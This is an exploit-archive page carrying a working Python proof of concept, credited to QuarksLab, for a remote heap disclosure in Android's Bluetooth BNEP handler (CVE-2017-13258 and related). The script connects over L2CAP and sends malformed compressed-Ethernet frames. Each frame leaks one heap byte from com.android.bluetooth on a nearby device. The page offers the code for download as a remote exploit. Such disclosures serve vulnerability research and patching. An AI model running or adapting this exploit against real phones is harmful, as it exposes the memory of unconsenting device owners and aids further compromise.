Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure: Posted Mar 23, 2018; Authored by QuarksLab; Android Bluetooth BNEP bnep_data_ind() remote heap disclosure proof of concept vulnerability.; tags | exploit, remote, proof of concept, info disclosure; advisories | CVE-2017-13258, CVE-2017-13260, CVE-2017-13261, CVE-2017-13262; SHA-256 | bca48d1c32a6cf579a5ece90b87234274c98bed6401f1470ca5a6cdcba4d5b50; Download | Favorite | View

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

import os
import sys
import struct
 
import bluetooth
 
BNEP_PSM = 15
BNEP_FRAME_COMPRESSED_ETHERNET = 0x02
LEAK_ATTEMPTS = 20
 
def leak(src_bdaddr, dst):
 
    bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
    bnep.settimeout(5)
    bnep.bind((src_bdaddr, 0))
    print 'Connecting to BNEP...'
    bnep.connect((dst, BNEP_PSM))
    bnep.settimeout(1)
    print 'Leaking bytes from the heap of com.android.bluetooth...'
 
    for i in range(LEAK_ATTEMPTS):
        # A byte from the heap at (p + controlled_length) will be leaked
        # if it's greater than BNEP_FILTER_MULTI_ADDR_RESPONSE_MSG (0x06).
        # This BNEP packet can be seen in Wireshark with the following info:
        # "Compressed Ethernet+E - Type: unknown[Malformed packet]".
        # The response sent by bnep_send_command_not_understood() contains 3 bytes:
        # 0x01 (BNEP_FRAME_CONTROL) + 0x00 (BNEP_CONTROL_COMMAND_NOT_UNDERSTOOD) + leaked byte
 
        # 0x82 & 0x80 == 0x80 -> Extension flag = True. 0x82 & 0x7f == 0x2 -> type
        type_and_ext_present = BNEP_FRAME_COMPRESSED_ETHERNET | 0x80
 
        # 0x80 -> ext -> we need to pass this check: !(ext & 0x7f)
        ext = 0x80
 
        # i -> length (the 'p' pointer is advanced by this length)
 
        bnep.send(struct.pack('<BBB', type_and_ext_present, ext, i))
        try:
            data = bnep.recv(3)
        except bluetooth.btcommon.BluetoothError:
            data = ''
 
        if data:
            print 'heap[p + 0x%02x] = 0x%02x' % (i, ord(data[-1]))
        else:
            print 'heap[p + 0x%02x] <= 6' % (i)
 
    print 'Closing connection.'
    bnep.close()
 
 
def main(src_bdaddr, dst):
    os.system('hciconfig %s sspmode 0' % (src_bdaddr,))
    os.system('hcitool dc %s' % (dst,))
 
    leak(src_bdaddr, dst)
 
 
if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python bnep01.py <src-bdaddr> <dst-bdaddr>')
    else:
        if os.getuid():
            print 'Error: This script must be run as root.'
        else:
            main(sys.argv[1], sys.argv[2])

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

Share This

Android Bluetooth BNEP bnep_data_ind() Remote Heap Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems